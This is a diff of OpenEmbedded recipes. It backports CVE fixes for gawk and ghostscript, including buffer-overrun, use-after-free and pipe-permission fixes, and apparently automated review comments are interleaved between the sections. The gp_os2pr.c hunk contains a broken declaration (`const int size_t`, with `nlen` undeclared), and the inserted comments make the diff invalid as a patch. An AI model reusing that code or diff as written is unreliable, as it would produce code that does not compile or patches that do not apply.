diff --git a/meta/recipes-extended/cwautomacros/cwautomacros_20110201.bb b/meta/recipes-extended/cwautomacros/cwautomacros_20110201.bb
index 65a99fc28d..e726899c52 100644
--- a/meta/recipes-extended/cwautomacros/cwautomacros_20110201.bb
+++ b/meta/recipes-extended/cwautomacros/cwautomacros_20110201.bb
@@ -1,6 +1,7 @@
SUMMARY = "Collection of autoconf m4 macros"
SECTION = "base"
HOMEPAGE = "http://sourceforge.net/projects/cwautomacros.berlios/"
+DESCRIPTION = "A collection of autoconf macros, plus an autogen.sh script that can be used with them."
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://LICENSE;md5=eb723b61539feef013de476e68b5c50a"
@@ -13,7 +14,7 @@ do_configure() {
}
do_install() {
- oe_runmake CWAUTOMACROSPREFIX=${D}${prefix} install
+ oe_runmake LABEL=`date -d @${SOURCE_DATE_EPOCH} +%Y%m%d` CWAUTOMACROSPREFIX=${D}${prefix} install
# cleanup buildpaths in autogen.sh
sed -i -e 's,${D},,g' ${D}${prefix}/share/cwautomacros/scripts/autogen.sh
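Review bot: The `LABEL` now passed to `oe_runmake` is computed by `date` in whatever time zone the task environment has, so unless the build configuration already forces UTC, two hosts with the same `SOURCE_DATE_EPOCH` can stamp different days when the epoch falls near midnight. Making it explicit costs nothing: `date -u -d @${SOURCE_DATE_EPOCH} +%Y%m%d`. `do_install` continues past the end of the hunk.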
diff --git a/meta/recipes-extended/ed/ed_1.15.bb b/meta/recipes-extended/ed/ed_1.15.bb
index 886c3ddcab..60e6a3d34e 100644
--- a/meta/recipes-extended/ed/ed_1.15.bb
+++ b/meta/recipes-extended/ed/ed_1.15.bb
@@ -1,5 +1,6 @@
SUMMARY = "Line-oriented text editor"
HOMEPAGE = "http://www.gnu.org/software/ed/"
+DESCRIPTION = "GNU ed is a line-oriented text editor. It is used to create, display, modify and otherwise manipulate text files, both interactively and via shell scripts. A restricted version of ed, red, can only edit files in the current directory and cannot execute shell commands."
LICENSE = "GPLv3+"
LIC_FILES_CHKSUM = "file://COPYING;md5=0c7051aef9219dc7237f206c5c4179a7 \
diff --git a/meta/recipes-extended/gawk/gawk/CVE-2023-4156.patch b/meta/recipes-extended/gawk/gawk/CVE-2023-4156.patch
new file mode 100644
index 0000000000..c6cba058a7
--- /dev/null
+++ b/meta/recipes-extended/gawk/gawk/CVE-2023-4156.patch
@@ -0,0 +1,28 @@
+From e709eb829448ce040087a3fc5481db6bfcaae212 Mon Sep 17 00:00:00 2001
+From: "Arnold D. Robbins" <arnold@skeeve.com>
+Date: Wed, 3 Aug 2022 13:00:54 +0300
+Subject: [PATCH] Smal bug fix in builtin.c.
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/gawk/tree/debian/patches/CVE-2023-4156.patch?h=ubuntu/focal-security
+Upstream commit https://git.savannah.gnu.org/gitweb/?p=gawk.git;a=commitdiff;h=e709eb829448ce040087a3fc5481db6bfcaae212]
+CVE: CVE-2023-4156
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ ChangeLog | 6 ++++++
+ builtin.c | 5 ++++-
+ 2 files changed, 10 insertions(+), 1 deletion(-)
+
+--- gawk-5.1.0.orig/builtin.c
++++ gawk-5.1.0/builtin.c
+@@ -957,7 +957,10 @@ check_pos:
+ s1++;
+ n0--;
+ }
+- if (val >= num_args) {
++ // val could be less than zero if someone provides a field width
++ // so large that it causes integer overflow. Mainly fuzzers do this,
++ // but let's try to be good anyway.
++ if (val < 0 || val >= num_args) {
+ toofew = true;
+ break;
+ }
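Review bot: The added `val < 0` test at `check_pos` detects the overflow only after it has happened; the new comment itself attributes the negative value to integer overflow, which for a signed type is undefined behaviour and is not guaranteed to wrap to a negative number. The accumulation of `val` is outside the hunk, so this is inferred, but a bound applied while the digits are consumed would be the sturdier fix and belongs upstream rather than in this backport. Separately, the diffstat still lists `ChangeLog | 6` and `2 files changed` although only the `builtin.c` hunk is carried; a header line such as `ChangeLog hunk dropped for the backport` would show that this is deliberate.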
diff --git a/meta/recipes-extended/gawk/gawk/remove-sensitive-tests.patch b/meta/recipes-extended/gawk/gawk/remove-sensitive-tests.patch
new file mode 100644
index 0000000000..167c0787ee
--- /dev/null
+++ b/meta/recipes-extended/gawk/gawk/remove-sensitive-tests.patch
@@ -0,0 +1,24 @@
+These tests require an unloaded host as otherwise timing sensitive tests can fail
+https://bugzilla.yoctoproject.org/show_bug.cgi?id=14371
+
+Upstream-Status: Inappropriate
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+--- a/test/Maketests~
++++ b/test/Maketests
+@@ -2069,7 +2069,2 @@
+
+-timeout:
+- @echo $@ $(ZOS_FAIL)
+- @AWKPATH="$(srcdir)" $(AWK) -f $@.awk >_$@ 2>&1 || echo EXIT CODE: $$? >>_$@
+- @-$(CMP) "$(srcdir)"/$@.ok _$@ && rm -f _$@
+-
+ typedregex1:
+@@ -2297,7 +2292,2 @@
+ @-$(CMP) "$(srcdir)"/$@.ok _$@ && rm -f _$@
+-
+-time:
+- @echo $@
+- @AWKPATH="$(srcdir)" $(AWK) -f $@.awk >_$@ 2>&1 || echo EXIT CODE: $$? >>_$@
+- @-$(CMP) "$(srcdir)"/$@.ok _$@ && rm -f _$@
+
diff --git a/meta/recipes-extended/gawk/gawk_5.0.1.bb b/meta/recipes-extended/gawk/gawk_5.0.1.bb
index e79ccfdebf..c71890c19e 100644
--- a/meta/recipes-extended/gawk/gawk_5.0.1.bb
+++ b/meta/recipes-extended/gawk/gawk_5.0.1.bb
@@ -16,7 +16,9 @@ PACKAGECONFIG[readline] = "--with-readline,--without-readline,readline"
PACKAGECONFIG[mpfr] = "--with-mpfr,--without-mpfr, mpfr"
SRC_URI = "${GNU_MIRROR}/gawk/gawk-${PV}.tar.gz \
+ file://remove-sensitive-tests.patch \
file://run-ptest \
+ file://CVE-2023-4156.patch \
"
SRC_URI[md5sum] = "c5441c73cc451764055ee65e9a4292bb"
@@ -41,13 +43,20 @@ inherit ptest
do_install_ptest() {
mkdir ${D}${PTEST_PATH}/test
ln -s ${bindir}/gawk ${D}${PTEST_PATH}/gawk
- for i in `grep -vE "@|^$|#|Gt-dummy" ${S}/test/Maketests |awk -F: '{print $1}'` Maketests inclib.awk; \
- do cp ${S}/test/$i* ${D}${PTEST_PATH}/test; \
+ # The list of tests is all targets in Maketests, apart from the dummy Gt-dummy
+ TESTS=$(awk -F: '$1 == "Gt-dummy" { next } /[[:alnum:]]+:$/ { print $1 }' ${S}/test/Maketests)
+ for i in $TESTS Maketests inclib.awk; do
+ cp ${S}/test/$i* ${D}${PTEST_PATH}/test
done
sed -i -e 's|/usr/local/bin|${bindir}|g' \
-e 's|#!${base_bindir}/awk|#!${bindir}/awk|g' ${D}${PTEST_PATH}/test/*.awk
- sed -i -e "s|GAWKLOCALE|LANG|g" ${D}${PTEST_PATH}/test/Maketests
+ sed -i -e "s|GAWKLOCALE|LANG|g" ${D}${PTEST_PATH}/test/Maketests
+
+ # These tests require an unloaded host as otherwise timing sensitive tests can fail
+ # https://bugzilla.yoctoproject.org/show_bug.cgi?id=14371
+ rm -f ${D}${PTEST_PATH}/test/time.*
+ rm -f ${D}${PTEST_PATH}/test/timeout.*
}
RDEPENDS_${PN}-ptest += "make"
diff --git a/meta/recipes-extended/ghostscript/ghostscript/0001-Bug-706897-Copy-pcx-buffer-overrun-fix-from-devices-.patch b/meta/recipes-extended/ghostscript/ghostscript/0001-Bug-706897-Copy-pcx-buffer-overrun-fix-from-devices-.patch
new file mode 100644
index 0000000000..91b9f6df50
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/0001-Bug-706897-Copy-pcx-buffer-overrun-fix-from-devices-.patch
@@ -0,0 +1,31 @@
+From d81b82c70bc1fb9991bb95f1201abb5dea55f57f Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Mon, 17 Jul 2023 14:06:37 +0100
+Subject: [PATCH] Bug 706897: Copy pcx buffer overrun fix from
+ devices/gdevpcx.c
+
+Bounds check the buffer, before dereferencing the pointer.
+
+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=d81b82c70bc1fb9991bb95f1201abb5dea55f57f]
+CVE: CVE-2023-38559
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ base/gdevdevn.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/base/gdevdevn.c b/base/gdevdevn.c
+index 3b019d6..2888776 100644
+--- a/base/gdevdevn.c
++++ b/base/gdevdevn.c
+@@ -1980,7 +1980,7 @@ devn_pcx_write_rle(const byte * from, const byte * end, int step, gp_file * file
+ byte data = *from;
+
+ from += step;
+- if (data != *from || from == end) {
++ if (from >= end || data != *from) {
+ if (data >= 0xc0)
+ gp_fputc(0xc1, file);
+ } else {
+--
+2.25.1
+
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2020-36773.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2020-36773.patch
new file mode 100644
index 0000000000..ea8bf26f3f
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2020-36773.patch
@@ -0,0 +1,109 @@
+From 8c7bd787defa071c96289b7da9397f673fddb874 Mon Sep 17 00:00:00 2001
+From: Ken Sharp <ken.sharp@artifex.com>
+Date: Wed, 20 May 2020 16:02:07 +0100
+Subject: [PATCH] txtwrite - address memory problems
+
+Bug #702229 " txtwrite: use after free in 9.51 on some files (regression from 9.50)"
+Also bug #702346 and the earlier report #701877.
+
+The problems occur because its possible for a single character code in
+a PDF file to map to more than a single Unicode code point. In the case
+of the file for 701877 the character code maps to 'f' and 'i' (it is an
+fi ligature).
+
+The code should deal with this, but we need to ensure we are using the
+correct index. In addition, if we do get more Unicode code points than
+we expected, we need to set the widths of the 'extra' code points to
+zero (we only want to consider the width of the original character).
+
+This does mean increasing the size of the Widths array to cater for
+the possibility of more entries on output than there were on input.
+
+While working on it I noticed that the Unicode remapping on little-
+endian machines was reversing the order of the Unicode values, when
+there was more than a single code point returned, so fixed that at
+the same time.
+
+Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;h=8c7bd787defa071c96289b7da9397f673fddb874]
+CVE: CVE-2020-36773
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ devices/vector/gdevtxtw.c | 26 ++++++++++++++++----------
+ 1 file changed, 16 insertions(+), 10 deletions(-)
+
+diff --git a/devices/vector/gdevtxtw.c b/devices/vector/gdevtxtw.c
+index 87f9355..bddce5a 100644
+--- a/devices/vector/gdevtxtw.c
++++ b/devices/vector/gdevtxtw.c
+@@ -1812,11 +1812,11 @@ static int get_unicode(textw_text_enum_t *penum, gs_font *font, gs_glyph glyph,
+ #else
+ b = (char *)Buffer;
+ u = (char *)unicode;
+- while (l >= 0) {
+- *b++ = *(u + l);
+- l--;
+- }
+
++ for (l=0;l<length;l+=2, u+=2){
++ *b++ = *(u+1);
++ *b++ = *u;
++ }
+ #endif
+ gs_free_object(penum->dev->memory, unicode, "free temporary unicode buffer");
+ return length / sizeof(short);
+@@ -1963,7 +1963,7 @@ txtwrite_process_plain_text(gs_text_enum_t *pte)
+ &penum->text_state->matrix, &wanted);
+ pte->returned.total_width.x += wanted.x;
+ pte->returned.total_width.y += wanted.y;
+- penum->Widths[pte->index - 1] = wanted.x;
++ penum->Widths[penum->TextBufferIndex] = wanted.x;
+
+ if (pte->text.operation & TEXT_ADD_TO_ALL_WIDTHS) {
+ gs_point tpt;
+@@ -1984,8 +1984,14 @@ txtwrite_process_plain_text(gs_text_enum_t *pte)
+ pte->returned.total_width.x += dpt.x;
+ pte->returned.total_width.y += dpt.y;
+
+- penum->TextBufferIndex += get_unicode(penum, (gs_font *)pte->orig_font, glyph, ch, &penum->TextBuffer[penum->TextBufferIndex]);
+- penum->Widths[pte->index - 1] += dpt.x;
++ penum->Widths[penum->TextBufferIndex] += dpt.x;
++ code = get_unicode(penum, (gs_font *)pte->orig_font, glyph, ch, &penum->TextBuffer[penum->TextBufferIndex]);
++ /* If a single text code returned multiple Unicode values, then we need to set the
++ * 'extra' code points' widths to 0.
++ */
++ if (code > 1)
++ memset(&penum->Widths[penum->TextBufferIndex + 1], 0x00, (code - 1) * sizeof(float));
++ penum->TextBufferIndex += code;
+ }
+ return 0;
+ }
+@@ -2123,7 +2129,7 @@ txt_add_fragment(gx_device_txtwrite_t *tdev, textw_text_enum_t *penum)
+ if (!penum->text_state->Widths)
+ return gs_note_error(gs_error_VMerror);
+ memset(penum->text_state->Widths, 0x00, penum->TextBufferIndex * sizeof(float));
+- memcpy(penum->text_state->Widths, penum->Widths, penum->text.size * sizeof(float));
++ memcpy(penum->text_state->Widths, penum->Widths, penum->TextBufferIndex * sizeof(float));
+
+ unsorted_entry->Unicode_Text = (unsigned short *)gs_malloc(tdev->memory->stable_memory,
+ penum->TextBufferIndex, sizeof(unsigned short), "txtwrite alloc sorted text buffer");
+@@ -2136,7 +2142,7 @@ txt_add_fragment(gx_device_txtwrite_t *tdev, textw_text_enum_t *penum)
+ if (!unsorted_entry->Widths)
+ return gs_note_error(gs_error_VMerror);
+ memset(unsorted_entry->Widths, 0x00, penum->TextBufferIndex * sizeof(float));
+- memcpy(unsorted_entry->Widths, penum->Widths, penum->text.size * sizeof(float));
++ memcpy(unsorted_entry->Widths, penum->Widths, penum->TextBufferIndex * sizeof(float));
+
+ unsorted_entry->FontName = (char *)gs_malloc(tdev->memory->stable_memory,
+ (strlen(penum->text_state->FontName) + 1), sizeof(unsigned char), "txtwrite alloc sorted text buffer");
+@@ -2192,7 +2198,7 @@ textw_text_process(gs_text_enum_t *pte)
+ if (!penum->TextBuffer)
+ return gs_note_error(gs_error_VMerror);
+ penum->Widths = (float *)gs_malloc(tdev->memory->stable_memory,
+- pte->text.size, sizeof(float), "txtwrite temporary widths array");
++ pte->text.size * 4, sizeof(float), "txtwrite temporary widths array");
+ if (!penum->Widths)
+ return gs_note_error(gs_error_VMerror);
+ }
+--
+2.25.1
+
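Review bot: The `Widths` allocation in `textw_text_process` grows to `pte->text.size * 4` entries, but nothing in the visible hunks checks `penum->TextBufferIndex` against that bound before `penum->Widths[penum->TextBufferIndex]` is written and the `memset` of `code - 1` floats runs in `txtwrite_process_plain_text`. The factor 4 is an unstated limit on how many code points one character code may expand to, and the multiplication is itself unchecked. A comment at the allocation such as `/* 4 = assumed maximum Unicode code points per character code */`, together with a guard like `if (penum->TextBufferIndex >= pte->text.size * 4) return gs_note_error(gs_error_rangecheck);` before the first write, would be worth proposing upstream. The sizing of `TextBuffer` is outside the hunks, so whether it already bounds the index cannot be told from here.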
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_1.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_1.patch
new file mode 100644
index 0000000000..033ba77f9a
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_1.patch
@@ -0,0 +1,121 @@
+From 3920a727fb19e19f597e518610ce2416d08cb75f Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Thu, 20 Aug 2020 17:19:09 +0100
+Subject: [PATCH] Fix pdfwrite "%d" mode with file permissions
+
+Firstly, in gx_device_delete_output_file the iodev pointer was being passed
+to the delete_method incorrectly (passing a pointer to that pointer). Thus
+when we attempted to use that to confirm permission to delete the file, it
+crashed. Credit to Ken for finding that.
+
+Secondly, due to the way pdfwrite works, when running with an output file per
+page, it creates the current output file immediately it has completed writing
+the previous one. Thus, it has to delete that partial file on exit.
+
+Previously, the output file was not added to the "control" permission list,
+so an attempt to delete it would result in an error. So add the output file
+to the "control" as well as "write" list.
+
+CVE: CVE-2021-3781
+
+Upstream-Status: Backport:
+https://git.ghostscript.com/?p=ghostpdl.git;a=commit;f=base/gslibctx.c;h=3920a727fb19e19f597e518610ce2416d08cb75f
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ base/gsdevice.c | 2 +-
+ base/gslibctx.c | 20 ++++++++++++++------
+ 2 files changed, 15 insertions(+), 7 deletions(-)
+
+diff --git a/base/gsdevice.c b/base/gsdevice.c
+index 913119495..ac78af93f 100644
+--- a/base/gsdevice.c
++++ b/base/gsdevice.c
+@@ -1185,7 +1185,7 @@ int gx_device_delete_output_file(const gx_device * dev, const char *fname)
+ parsed.len = strlen(parsed.fname);
+ }
+ if (parsed.iodev)
+- code = parsed.iodev->procs.delete_file((gx_io_device *)(&parsed.iodev), (const char *)parsed.fname);
++ code = parsed.iodev->procs.delete_file((gx_io_device *)(parsed.iodev), (const char *)parsed.fname);
+ else
+ code = gs_note_error(gs_error_invalidfileaccess);
+
+diff --git a/base/gslibctx.c b/base/gslibctx.c
+index d726c58b5..ff8fc895e 100644
+--- a/base/gslibctx.c
++++ b/base/gslibctx.c
+@@ -647,7 +647,7 @@ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ char *fp, f[gp_file_name_sizeof];
+ const int pipe = 124; /* ASCII code for '|' */
+ const int len = strlen(fname);
+- int i;
++ int i, code;
+
+ /* Be sure the string copy will fit */
+ if (len >= gp_file_name_sizeof)
+@@ -658,8 +658,6 @@ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ rewrite_percent_specifiers(f);
+ for (i = 0; i < len; i++) {
+ if (f[i] == pipe) {
+- int code;
+-
+ fp = &f[i + 1];
+ /* Because we potentially have to check file permissions at two levels
+ for the output file (gx_device_open_output_file and the low level
+@@ -671,10 +669,16 @@ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ if (code < 0)
+ return code;
+ break;
++ code = gs_add_control_path(mem, gs_permit_file_control, f);
++ if (code < 0)
++ return code;
+ }
+ if (!IS_WHITESPACE(f[i]))
+ break;
+ }
++ code = gs_add_control_path(mem, gs_permit_file_control, fp);
++ if (code < 0)
++ return code;
+ return gs_add_control_path(mem, gs_permit_file_writing, fp);
+ }
+
+@@ -684,7 +688,7 @@ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ char *fp, f[gp_file_name_sizeof];
+ const int pipe = 124; /* ASCII code for '|' */
+ const int len = strlen(fname);
+- int i;
++ int i, code;
+
+ /* Be sure the string copy will fit */
+ if (len >= gp_file_name_sizeof)
+@@ -694,8 +698,6 @@ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ /* Try to rewrite any %d (or similar) in the string */
+ for (i = 0; i < len; i++) {
+ if (f[i] == pipe) {
+- int code;
+-
+ fp = &f[i + 1];
+ /* Because we potentially have to check file permissions at two levels
+ for the output file (gx_device_open_output_file and the low level
+@@ -704,6 +706,9 @@ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ the pipe_fopen(), the leading '|' has been stripped.
+ */
+ code = gs_remove_control_path(mem, gs_permit_file_writing, f);
++ if (code < 0)
++ return code;
++ code = gs_remove_control_path(mem, gs_permit_file_control, f);
+ if (code < 0)
+ return code;
+ break;
+@@ -711,6 +716,9 @@ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ if (!IS_WHITESPACE(f[i]))
+ break;
+ }
++ code = gs_remove_control_path(mem, gs_permit_file_control, fp);
++ if (code < 0)
++ return code;
+ return gs_remove_control_path(mem, gs_permit_file_writing, fp);
+ }
+
+--
+2.25.1
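Review bot: In the `base/gsdevice.c` hunk the corrected `delete_file` call keeps the `(gx_io_device *)` cast on its first argument, and that cast is what let the original `&parsed.iodev` compile without a diagnostic. If `parsed.iodev` is already a `gx_io_device *` (its declaration is outside the hunk), the cast can be dropped: `code = parsed.iodev->procs.delete_file(parsed.iodev, (const char *)parsed.fname);`. Without the cast, a future pointer-level mistake on this permission-checked delete path is reported by the compiler instead of surfacing as a crash at run time.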
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_2.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_2.patch
new file mode 100644
index 0000000000..beade79eef
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_2.patch
@@ -0,0 +1,37 @@
+From 9daf042fd7bb19e93388d89d9686a2fa4496f382 Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Mon, 24 Aug 2020 09:24:31 +0100
+Subject: [PATCH] Coverity 361429: move "break" to correct place.
+
+We had to add the outputfile to the "control" file permission list (as well
+as write), but for the "pipe" case, I accidentally added the call after the
+break out of loop that checks for a pipe.
+
+CVE: CVE-2021-3781
+
+Upstream-Status: Backport:
+https://git.ghostscript.com/?p=ghostpdl.git;a=commit;f=base/gslibctx.c;h=9daf042fd7bb19e93388d89d9686a2fa4496f382
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ base/gslibctx.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/base/gslibctx.c b/base/gslibctx.c
+index ff8fc895e..63dfbe2e0 100644
+--- a/base/gslibctx.c
++++ b/base/gslibctx.c
+@@ -668,10 +668,10 @@ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ code = gs_add_control_path(mem, gs_permit_file_writing, f);
+ if (code < 0)
+ return code;
+- break;
+ code = gs_add_control_path(mem, gs_permit_file_control, f);
+ if (code < 0)
+ return code;
++ break;
+ }
+ if (!IS_WHITESPACE(f[i]))
+ break;
+--
+2.25.1
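Review bot: The provenance line in this patch header is written as `Upstream-Status: Backport:` with the URL on the following line, which is not the documented `Upstream-Status: Backport [reference]` form. The same layout is used in CVE-2021-3781_1.patch and CVE-2021-3781_3.patch. Writing it as `Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;f=base/gslibctx.c;h=9daf042fd7bb19e93388d89d9686a2fa4496f382]` keeps the status and the upstream commit on one line. For security backports that line is what lets a reviewer or a script tie the carried patch to the upstream fix.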
diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_3.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_3.patch
new file mode 100644
index 0000000000..e3f9e81c45
--- /dev/null
+++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-3781_3.patch
@@ -0,0 +1,238 @@
+From a9bd3dec9fde03327a4a2c69dad1036bf9632e20 Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Tue, 7 Sep 2021 20:36:12 +0100
+Subject: [PATCH] Bug 704342: Include device specifier strings in access
+ validation
+
+for the "%pipe%", %handle%" and %printer% io devices.
+
+We previously validated only the part after the "%pipe%" Postscript device
+specifier, but this proved insufficient.
+
+This rebuilds the original file name string, and validates it complete. The
+slight complication for "%pipe%" is it can be reached implicitly using
+"|" so we have to check both prefixes.
+
+Addresses CVE-2021-3781
+
+CVE: CVE-2021-3781
+
+Upstream-Status: Backport:
+https://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=a9bd3dec9fde
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ base/gdevpipe.c | 22 +++++++++++++++-
+ base/gp_mshdl.c | 11 +++++++-
+ base/gp_msprn.c | 10 ++++++-
+ base/gp_os2pr.c | 13 +++++++++-
+ base/gslibctx.c | 69 ++++++++++---------------------------------------
+ 5 files changed, 65 insertions(+), 60 deletions(-)
+
+diff --git a/base/gdevpipe.c b/base/gdevpipe.c
+index 96d71f5d8..5bdc485be 100644
+--- a/base/gdevpipe.c
++++ b/base/gdevpipe.c
+@@ -72,8 +72,28 @@ pipe_fopen(gx_io_device * iodev, const char *fname, const char *access,
+ #else
+ gs_lib_ctx_t *ctx = mem->gs_lib_ctx;
+ gs_fs_list_t *fs = ctx->core->fs;
++ /* The pipe device can be reached in two ways, explicltly with %pipe%
++ or implicitly with "|", so we have to check for both
++ */
++ char f[gp_file_name_sizeof];
++ const char *pipestr = "|";
++ const size_t pipestrlen = strlen(pipestr);
++ const size_t preflen = strlen(iodev->dname);
++ const size_t nlen = strlen(fname);
++ int code1;
++
++ if (preflen + nlen >= gp_file_name_sizeof)
++ return_error(gs_error_invalidaccess);
++
++ memcpy(f, iodev->dname, preflen);
++ memcpy(f + preflen, fname, nlen + 1);
++
++ code1 = gp_validate_path(mem, f, access);
++
++ memcpy(f, pipestr, pipestrlen);
++ memcpy(f + pipestrlen, fname, nlen + 1);
+
+- if (gp_validate_path(mem, fname, access) != 0)
++ if (code1 != 0 && gp_validate_path(mem, f, access) != 0 )
+ return gs_error_invalidfileaccess;
+
+ /*
+diff --git a/base/gp_mshdl.c b/base/gp_mshdl.c
+index 2b964ed74..8d87ceadc 100644
+--- a/base/gp_mshdl.c
++++ b/base/gp_mshdl.c
+@@ -95,8 +95,17 @@ mswin_handle_fopen(gx_io_device * iodev, const char *fname, const char *access,
+ long hfile; /* Correct for Win32, may be wrong for Win64 */
+ gs_lib_ctx_t *ctx = mem->gs_lib_ctx;
+ gs_fs_list_t *fs = ctx->core->fs;
++ char f[gp_file_name_sizeof];
++ const size_t preflen = strlen(iodev->dname);
++ const size_t nlen = strlen(fname);
+
+- if (gp_validate_path(mem, fname, access) != 0)
++ if (preflen + nlen >= gp_file_name_sizeof)
++ return_error(gs_error_invalidaccess);
++
++ memcpy(f, iodev->dname, preflen);
++ memcpy(f + preflen, fname, nlen + 1);
++
++ if (gp_validate_path(mem, f, access) != 0)
+ return gs_error_invalidfileaccess;
+
+ /* First we try the open_handle method. */
+diff --git a/base/gp_msprn.c b/base/gp_msprn.c
+index ed4827968..746a974f7 100644
+--- a/base/gp_msprn.c
++++ b/base/gp_msprn.c
+@@ -168,8 +168,16 @@ mswin_printer_fopen(gx_io_device * iodev, const char *fname, const char *access,
+ unsigned long *ptid = &((tid_t *)(iodev->state))->tid;
+ gs_lib_ctx_t *ctx = mem->gs_lib_ctx;
+ gs_fs_list_t *fs = ctx->core->fs;
++ const size_t preflen = strlen(iodev->dname);
++ const size_t nlen = strlen(fname);
+
+- if (gp_validate_path(mem, fname, access) != 0)
++ if (preflen + nlen >= gp_file_name_sizeof)
++ return_error(gs_error_invalidaccess);
++
++ memcpy(pname, iodev->dname, preflen);
++ memcpy(pname + preflen, fname, nlen + 1);
++
++ if (gp_validate_path(mem, pname, access) != 0)
+ return gs_error_invalidfileaccess;
+
+ /* First we try the open_printer method. */
+diff --git a/base/gp_os2pr.c b/base/gp_os2pr.c
+index f852c71fc..ba54cde66 100644
+--- a/base/gp_os2pr.c
++++ b/base/gp_os2pr.c
+@@ -107,9 +107,20 @@ os2_printer_fopen(gx_io_device * iodev, const char *fname, const char *access,
+ FILE ** pfile, char *rfname, uint rnamelen)
+ {
+ os2_printer_t *pr = (os2_printer_t *)iodev->state;
+- char driver_name[256];
++ char driver_name[gp_file_name_sizeof];
+ gs_lib_ctx_t *ctx = mem->gs_lib_ctx;
+ gs_fs_list_t *fs = ctx->core->fs;
++ const size_t preflen = strlen(iodev->dname);
++ const int size_t = strlen(fname);
++
++ if (preflen + nlen >= gp_file_name_sizeof)
++ return_error(gs_error_invalidaccess);
++
++ memcpy(driver_name, iodev->dname, preflen);
++ memcpy(driver_name + preflen, fname, nlen + 1);
++
++ if (gp_validate_path(mem, driver_name, access) != 0)
++ return gs_error_invalidfileaccess;
+
+ /* First we try the open_printer method. */
+ /* Note that the loop condition here ensures we don't
+diff --git a/base/gslibctx.c b/base/gslibctx.c
+index 6dfed6cd5..318039fad 100644
+--- a/base/gslibctx.c
++++ b/base/gslibctx.c
+@@ -655,82 +655,39 @@ rewrite_percent_specifiers(char *s)
+ int
+ gs_add_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ {
+- char *fp, f[gp_file_name_sizeof];
+- const int pipe = 124; /* ASCII code for '|' */
+- const int len = strlen(fname);
+- int i, code;
++ char f[gp_file_name_sizeof];
++ int code;
+
+ /* Be sure the string copy will fit */
+- if (len >= gp_file_name_sizeof)
++ if (strlen(fname) >= gp_file_name_sizeof)
+ return gs_error_rangecheck;
+ strcpy(f, fname);
+- fp = f;
+ /* Try to rewrite any %d (or similar) in the string */
+ rewrite_percent_specifiers(f);
+- for (i = 0; i < len; i++) {
+- if (f[i] == pipe) {
+- fp = &f[i + 1];
+- /* Because we potentially have to check file permissions at two levels
+- for the output file (gx_device_open_output_file and the low level
+- fopen API, if we're using a pipe, we have to add both the full string,
+- (including the '|', and just the command to which we pipe - since at
+- the pipe_fopen(), the leading '|' has been stripped.
+- */
+- code = gs_add_control_path(mem, gs_permit_file_writing, f);
+- if (code < 0)
+- return code;
+- code = gs_add_control_path(mem, gs_permit_file_control, f);
+- if (code < 0)
+- return code;
+- break;
+- }
+- if (!IS_WHITESPACE(f[i]))
+- break;
+- }
+- code = gs_add_control_path(mem, gs_permit_file_control, fp);
++
++ code = gs_add_control_path(mem, gs_permit_file_control, f);
+ if (code < 0)
+ return code;
+- return gs_add_control_path(mem, gs_permit_file_writing, fp);
++ return gs_add_control_path(mem, gs_permit_file_writing, f);
+ }
+
+ int
+ gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname)
+ {
+- char *fp, f[gp_file_name_sizeof];
+- const int pipe = 124; /* ASCII code for '|' */
+- const int len = strlen(fname);
+- int i, code;
++ char f[gp_file_name_sizeof];
++ int code;
+
+ /* Be sure the string copy will fit */
+- if (len >= gp_file_name_sizeof)
++ if (strlen(fname) >= gp_file_name_sizeof)
+ return gs_error_rangecheck;
+ strcpy(f, fname);
+- fp = f;
+ /* Try to rewrite any %d (or similar) in the string */
+- for (i = 0; i < len; i++) {
+- if (f[i] == pipe) {
+- fp = &f[i + 1];
+- /* Because we potentially have to check file permissions at two levels
+- for the output file (gx_device_open_output_file and the low level
